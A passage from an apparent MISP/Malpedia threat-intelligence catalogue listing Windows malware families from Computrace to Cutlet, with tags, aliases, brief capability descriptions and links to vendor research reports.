https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence
https://securelist.com/apt-trends-report-q2-2019/91897/

Computrace

The tag is: misp-galaxy:malpedia="Computrace"

Computrace is also known as:

lojack

Table 1610. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace
https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/
https://www.secureworks.com/research/threat-profiles/iron-twilight
https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html
https://asert.arbornetworks.com/lojack-becomes-a-double-agent/

ComradeCircle

The tag is: misp-galaxy:malpedia="ComradeCircle"

ComradeCircle is also known as:

Table 1611. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.comrade_circle
https://twitter.com/struppigel/status/816926371867926528

concealment_troy

The tag is: misp-galaxy:malpedia="concealment_troy"

concealment_troy is also known as:

Table 1612. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.concealment_troy
https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf
http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html

Conficker

The tag is: misp-galaxy:malpedia="Conficker"

Conficker is also known as:

Kido
downadup
traffic converter

Table 1613. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker
https://www.sophos.com/fr-fr/medialibrary/PDFs/marketing%20material/confickeranalysis.pdf
https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf
https://www.minitool.com/backup-tips/conficker-worm.html
http://www.csl.sri.com/users/vinod/papers/Conficker/addendumC/index.html
https://www.kaspersky.com/about/press-releases/2009_kaspersky-lab-analyses-new-version-of-kido—conficker
https://github.com/tillmannw/cnfckr
http://contagiodump.blogspot.com/2009/05/win32conficker.html

Confucius

The tag is: misp-galaxy:malpedia="Confucius"

Confucius is also known as:

Table 1614. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.confucius
https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/
https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat
https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html
https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/

Conti

Ransomware.

The tag is: misp-galaxy:malpedia="Conti"

Conti is also known as:

Table 1615. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.conti
https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/
https://www.youtube.com/watch?v=hmaWy9QIC7c
https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent
https://news.sophos.com/en-us/2021/02/16/conti-ransomware-attack-day-by-day/
https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/
http://chuongdong.com/reverse%20engineering/2020/12/15/ContiRansomware/
https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound
https://news.sophos.com/en-us/2021/02/16/what-to-expect-when-youve-been-hit-with-conti-ransomware/
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/
https://www.crowdstrike.com/blog/wizard-spider-adversary-update/
https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/
https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/
https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one
https://news.sophos.com/en-us/2021/02/16/conti-ransomware-evasive-by-nature/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf
https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/
https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/
https://twitter.com/AltShiftPrtScn/status/1417849181012647938
https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/
https://us-cert.cisa.gov/ncas/alerts/aa21-265a
https://github.com/cdong1012/ContiUnpacker
https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html
https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf
https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf
https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/
https://www.ic3.gov/Media/News/2021/210521.pdf
https://thedfirreport.com/2021/05/12/conti-ransomware/
https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/
https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/
https://www.bleepingcomputer.com/news/security/angry-conti-ransomware-affiliate-leaks-gangs-attack-playbook/
https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel
https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/
https://0xthreatintel.medium.com/reversing-conti-ransomware-bfce15019e74
https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti
https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf
https://blog.talosintelligence.com/2021/09/Conti-leak-translation.html
https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/
https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/
https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide
https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations
https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/
https://twitter.com/AltShiftPrtScn/status/1350755169965924352
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://unit42.paloaltonetworks.com/conti-ransomware-gang/
https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf
https://assets.sentinelone.com/ransomware-enterprise/conti-ransomware-unpacked
https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/
https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf
https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider
https://therecord.media/disgruntled-ransomware-affiliate-leaks-the-conti-gangs-technical-manuals/
https://www.bleepingcomputer.com/news/security/ryuk-successor-conti-ransomware-releases-data-leak-site/
https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf
https://twitter.com/AltShiftPrtScn/status/1423188974298861571

Contopee

FireEye described this malware as a proxy-aware backdoor that communicates using a custom-encrypted binary protocol. It may use the registry to store optional configuration data. The backdoor has been observed to support 26 commands that include directory traversal, file system manipulation, data archival and transmission, and command execution.

The tag is: misp-galaxy:malpedia="Contopee"

Contopee is also known as:

WHITEOUT

Table 1616. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee
https://content.fireeye.com/apt/rpt-apt38
https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks
https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks

CookieBag

The tag is: misp-galaxy:malpedia="CookieBag"

CookieBag is also known as:

Table 1617. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cookiebag
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

CopperStealer

The tag is: misp-galaxy:malpedia="CopperStealer"

CopperStealer is also known as:

Table 1618. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.copper_stealer
https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft

Corebot

The tag is: misp-galaxy:malpedia="Corebot"

Corebot is also known as:

Table 1619. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report_BosonSpider.pdf
https://www.crowdstrike.com/blog/ecrime-ecosystem/
https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/

CoreDN

The tag is: misp-galaxy:malpedia="CoreDN"

CoreDN is also known as:

Table 1620. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.coredn
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/
https://blog.talosintelligence.com/2019/01/fake-korean-job-posting.html
https://www.symantec.com/security-center/writeup/2018-021216-4405-99#technicaldescription
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/#atricle-content
https://blog.alyac.co.kr/2105

Coreshell

The tag is: misp-galaxy:malpedia="Coreshell"

Coreshell is also known as:

SOURFACE

Table 1621. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell
http://malware.prevenity.com/2014/08/malware-info.html
http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf
https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html
http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html

CoronaVirus Ransomware

The tag is: misp-galaxy:malpedia="CoronaVirus Ransomware"

CoronaVirus Ransomware is also known as:

CoronaVirus Cover-Ransomware

Table 1622. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.coronavirus_ransomware
https://id-ransomware.blogspot.com/2020/03/coronavirus-ransomware.html

Cotx RAT

The tag is: misp-galaxy:malpedia="Cotx RAT"

Cotx RAT is also known as:

Table 1623. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cotx
https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf
https://www.youtube.com/watch?v=1WfPlgtfWnQ
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://vblocalhost.com/uploads/VB2020-20.pdf
https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html
https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology
https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf

Covicli

Covicli is a modified SSLeay32 dynamic library designated as a backdoor. The dynamic library allows the attacker to communicate with the C2 over openSSL.

The tag is: misp-galaxy:malpedia="Covicli"

Covicli is also known as:

Covically

Table 1624. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.covicli
https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf

CoViper

The tag is: misp-galaxy:malpedia="CoViper"

CoViper is also known as:

Table 1625. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.coviper
https://decoded.avast.io/janrubin/coviper-locking-down-computers-during-lockdown/
https://tccontre.blogspot.com/2020/04/covid19-malware-analysis-with-kill-mbr.html

crackshot

CRACKSHOT is a downloader that can download files, including binaries, and run them from the hard disk or execute them directly in memory. It is also capable of placing itself into a dormant state.

The tag is: misp-galaxy:malpedia="crackshot"

crackshot is also known as:

Table 1626. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.crackshot
https://content.fireeye.com/apt-41/rpt-apt41/

CradleCore

The tag is: misp-galaxy:malpedia="CradleCore"

CradleCore is also known as:

Table 1627. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore

CRAT

According to Cisco Talos, CRAT is a remote access trojan with plugin capabilites, used by Lazarus since at least May 2020.

The tag is: misp-galaxy:malpedia="CRAT"

CRAT is also known as:

Table 1628. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.crat
https://mp.weixin.qq.com/s/2sV-DrleHiJMSpSCW0kAMg
https://suspected.tistory.com/269
https://www.secrss.com/articles/18635
https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html
https://blog.talosintelligence.com/2020/11/crat-and-plugins.html

CREAMSICLE

The tag is: misp-galaxy:malpedia="CREAMSICLE"

CREAMSICLE is also known as:

Table 1629. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.creamsicle
https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Credraptor

The tag is: misp-galaxy:malpedia="Credraptor"

Credraptor is also known as:

Table 1630. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.credraptor
http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/

Crenufs

The tag is: misp-galaxy:malpedia="Crenufs"

Crenufs is also known as:

Table 1631. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.crenufs

Crimson RAT

The tag is: misp-galaxy:malpedia="Crimson RAT"

Crimson RAT is also known as:

SEEDOOR
Scarimson

Table 1632. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson
https://www.seqrite.com/blog/operation-honey-trap-apt36-targets-defense-organizations-in-india/
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://anchorednarratives.substack.com/p/trouble-in-asia-and-the-middle-east
https://twitter.com/teamcymru/status/1351228309632385027
https://team-cymru.com/blog/2021/04/16/transparent-tribe-apt-infrastructure-mapping/
https://team-cymru.com/blog/2021/07/02/transparent-tribe-apt-infrastructure-mapping-2/
https://securelist.com/transparent-tribe-part-2/98233/
https://cybleinc.com/2021/04/30/transparent-tribe-operating-with-a-new-variant-of-crimson-rat/
https://www.secureworks.com/research/threat-profiles/copper-fieldstone
https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg
https://blog.yoroi.company/research/transparent-tribe-four-years-later
https://securelist.com/apt-trends-report-q3-2020/99204/
https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF
https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html
https://mp.weixin.qq.com/s/ELYDvdMiiy4FZ3KpmAddZQ
https://s.tencent.com/research/report/669.html
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware
https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg
https://www.secrss.com/articles/24995
https://securelist.com/transparent-tribe-part-1/98127/
https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf
https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

CrimsonIAS

According to ThreatConnect, CrimsonIAS is a Delphi-written backdoor dating back to at least 2017. It enables operators to run command line tools, exfiltrate files, and upload files to the infected machine. CrimsonIAS is notable as it listens for incoming connections only; making it different from typical Windows backdoors that beacons out.

The tag is: misp-galaxy:malpedia="CrimsonIAS"

CrimsonIAS is also known as:

Table 1633. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.crimsonias
https://threatconnect.com/blog/crimsonias-listening-for-an-3v1l-user/

Cring

Ransomware.

The tag is: misp-galaxy:malpedia="Cring"

Cring is also known as:

Table 1634. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cring
https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html
https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Vulnerability-in-Fortigate-VPN-servers-is-exploited-in-Cring-ransomware-attacks-En.pdf
https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/?cmp=30728
https://twitter.com/swisscom_csirt/status/1354052879158571008

CROSSWALK

According to FireEye, CROSSWALK is a skeletal, modular backdoor capable of system survey and adding modules in response to C&C replies.

The tag is: misp-galaxy:malpedia="CROSSWALK"

CROSSWALK is also known as:

Motnug
ProxIP
TOMMYGUN

Table 1635. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.crosswalk
https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/
https://securelist.com/apt-trends-report-q3-2020/99204/
https://www.youtube.com/watch?v=8x-pGlWpIYI
https://www.carbonblack.com/2019/09/30/cb-threat-analysis-unit-technical-analysis-of-crosswalk/
https://www.youtube.com/watch?v=FttiysUZmDw
https://thehackernews.com/2021/01/researchers-disclose-undocumented.html
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://content.fireeye.com/apt-41/rpt-apt41/
https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-state-sponsored-espionage-group-targeting-multiple-verticals-with-crosswalk/
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware
https://twitter.com/MrDanPerez/status/1159459082534825986

Crutch

The tag is: misp-galaxy:malpedia="Crutch"

Crutch is also known as:

Table 1636. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.crutch
https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf
https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/

Cryakl

The tag is: misp-galaxy:malpedia="Cryakl"

Cryakl is also known as:

CryLock

Table 1637. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl
https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj_{Cryakl-B/detailed-analysis.aspx[https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj}Cryakl-B/detailed-analysis.aspx]
https://hackmag.com/security/ransomware-russian-style/
https://securelist.com/the-return-of-fantomas-or-how-we-deciphered-cryakl/86511/
https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/
https://securelist.com/cis-ransomware/104452/
https://twitter.com/albertzsigovits/status/1217866089964679174
https://twitter.com/bartblaze/status/1305197264332369920
https://www.telekom.com/en/blog/group/article/lockdata-auction-631300
https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
https://bartblaze.blogspot.com/2016/02/vipasana-ransomware-new-ransom-on-block.html
https://blog.checkpoint.com/2015/11/04/offline-ransomware-encrypts-your-data-without-cc-communication/
https://twitter.com/demonslay335/status/971164798376468481

CryLocker

The tag is: misp-galaxy:malpedia="CryLocker"

CryLocker is also known as:

Table 1638. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.crylocker

CrypMic

The tag is: misp-galaxy:malpedia="CrypMic"

CrypMic is also known as:

Table 1639. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.crypmic
https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/
https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/

Crypt0l0cker

The tag is: misp-galaxy:malpedia="Crypt0l0cker"

Crypt0l0cker is also known as:

Table 1640. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.crypt0l0cker
http://blog.talosintelligence.com/2017/08/first-look-crypt0l0cker.html

CryptBot

A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.

The tag is: misp-galaxy:malpedia="CryptBot"

CryptBot is also known as:

Table 1641. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
https://www.gdatasoftware.com/blog/2020/02/35802-bitbucket-abused-as-malware-slinger

CrypticConvo

CrypticConvo is a dropper trojan which appears to be embedded in an automatic generator framework to deliver the FakeM trojan. According to PaloaltoNetworks CrypticConvo and several additional trojans are believed to be included in a meta framework used by the "Scarlet Mimic" threat actor in order to quickly evade AV systems.

The tag is: misp-galaxy:malpedia="CrypticConvo"

CrypticConvo is also known as:

Table 1642. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptic_convo
https://unit42.paloaltonetworks.com/scarlet-mimic-years-long-espionage-targets-minority-activists/

CryptoDarkRubix

The tag is: misp-galaxy:malpedia="CryptoDarkRubix"

CryptoDarkRubix is also known as:

Ranet

Table 1643. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptodarkrubix
https://id-ransomware.blogspot.com/2020/03/cryptodarkrubix-ransomware.html

CryptoLocker

CryptoLocker is a new sophisticated malware that was launched in the late 2013. It is designed to attack Windows operating system by encrypting all the files from the system using a RSA-2048 public key. To decrypt the mentioned files, the user has to pay a ransom (usually 300 USD/EUR) or 2 BitCoins.

The tag is: misp-galaxy:malpedia="CryptoLocker"

CryptoLocker is also known as:

Table 1644. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker
https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/
http://www.secureworks.com/research/threat-profiles/gold-evergreen
https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group
https://sites.temple.edu/care/ci-rw-attacks/
https://www.secureworks.com/research/threat-profiles/gold-evergreen
https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf
https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf
https://www.secureworks.com/research/cryptolocker-ransomware
https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware

CryptoLuck

The tag is: misp-galaxy:malpedia="CryptoLuck"

CryptoLuck is also known as:

Table 1645. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoluck
http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/

CryptoMix

A variant of CryptoMix is win.clop.

The tag is: misp-galaxy:malpedia="CryptoMix"

CryptoMix is also known as:

CryptFile2

Table 1646. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix
https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/
https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/
https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/

CryptoPatronum

CryptoPatronum is a ransomware that encrypts user data through AES-256 (CBC) and it asks for BTC / ETH in order to get back the original files. In the ransom note there is not a title but only a reference to crsss.exe: its original file name. Once the files are encrypted, CryptoPatronum adds a .enc extension.

The tag is: misp-galaxy:malpedia="CryptoPatronum"

CryptoPatronum is also known as:

Table 1647. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptopatronum
https://id-ransomware.blogspot.com/2020/01/cryptopatronum-ransomware.html

Cryptorium

The tag is: misp-galaxy:malpedia="Cryptorium"

Cryptorium is also known as:

Table 1648. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptorium
https://twitter.com/struppigel/status/810770490491043840

CryptoShield

The tag is: misp-galaxy:malpedia="CryptoShield"

CryptoShield is also known as:

Table 1649. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshield
https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/
http://www.broadanalysis.com/2017/03/14/rig-exploit-kit-via-the-eitest-delivers-cryptoshieldrevenge-ransomware/

CryptoShuffler

The tag is: misp-galaxy:malpedia="CryptoShuffler"

CryptoShuffler is also known as:

Table 1650. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshuffler
https://www.bleepingcomputer.com/news/security/cryptoshuffler-stole-150-000-by-replacing-bitcoin-wallet-ids-in-pc-clipboards/

Cryptowall

The tag is: misp-galaxy:malpedia="Cryptowall"

Cryptowall is also known as:

Table 1651. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://ryancor.medium.com/genetic-analysis-of-cryptowall-ransomware-843f86055c7f
https://sites.temple.edu/care/ci-rw-attacks/

CryptoWire

The tag is: misp-galaxy:malpedia="CryptoWire"

CryptoWire is also known as:

Table 1652. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowire
https://www.bleepingcomputer.com/news/security/-proof-of-concept-cryptowire-ransomware-spawns-lomix-and-ultralocker-families/

CryptoFortress

The tag is: misp-galaxy:malpedia="CryptoFortress"

CryptoFortress is also known as:

Table 1653. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress
https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/
http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html

CryptoRansomeware

The tag is: misp-galaxy:malpedia="CryptoRansomeware"

CryptoRansomeware is also known as:

Table 1654. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_ransomeware
https://twitter.com/JaromirHorejsi/status/818369717371027456

CryptXXXX

The tag is: misp-galaxy:malpedia="CryptXXXX"

CryptXXXX is also known as:

Table 1655. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptxxxx
https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/
https://www.sentinelone.com/blog/sophisticated-new-packer-identified-in-cryptxxx-ransomware-sample/

CsExt

The tag is: misp-galaxy:malpedia="CsExt"

CsExt is also known as:

Table 1656. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.csext
https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

CTB Locker

The tag is: misp-galaxy:malpedia="CTB Locker"

CTB Locker is also known as:

Table 1657. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ctb_locker
https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://samvartaka.github.io/malware/2015/11/20/ctb-locker

Cuba

Ransomware.

The tag is: misp-galaxy:malpedia="Cuba"

Cuba is also known as:

Table 1658. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cuba
https://id-ransomware.blogspot.com/2019/12/cuba-ransomware.html
https://shared-public-reports.s3-eu-west-1.amazonaws.com/Cuba+Ransomware+Group+-on+a+roll.pdf[https://shared-public-reports.s3-eu-west-1.amazonaws.com/Cuba+Ransomware+Group-+on+a+roll.pdf]
https://blog.group-ib.com/hancitor-cuba-ransomware
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-threat-report-a-quick-primer-on-cuba-ransomware
https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf

Cuegoe

The tag is: misp-galaxy:malpedia="Cuegoe"

Cuegoe is also known as:

Table 1659. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe
https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html
https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal

Cueisfry

The tag is: misp-galaxy:malpedia="Cueisfry"

Cueisfry is also known as:

Table 1660. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cueisfry
https://www.secureworks.com/blog/apt-campaign-leverages-the-cueisfry-trojan-and-microsoft-word-vulnerability-cve-2014-1761

Curator

Profero describes this as a ransomware family using CryptoPP as library to enable file encryption with the Salsa20 algorithm and protecting the encryption keys with RSA2048.

The tag is: misp-galaxy:malpedia="Curator"

Curator is also known as:

Ever101

Table 1661. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.curator
https://shared-public-reports.s3.eu-west-1.amazonaws.com/Secrets_behind_the_mysterious_ever101_ransomware.pdf

Cursed Murderer

Ransomware.

The tag is: misp-galaxy:malpedia="Cursed Murderer"

Cursed Murderer is also known as:

Table 1662. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cursed_murderer
https://id-ransomware.blogspot.com/2020/01/thecursedmurderer-ransomware.html

Cutlet

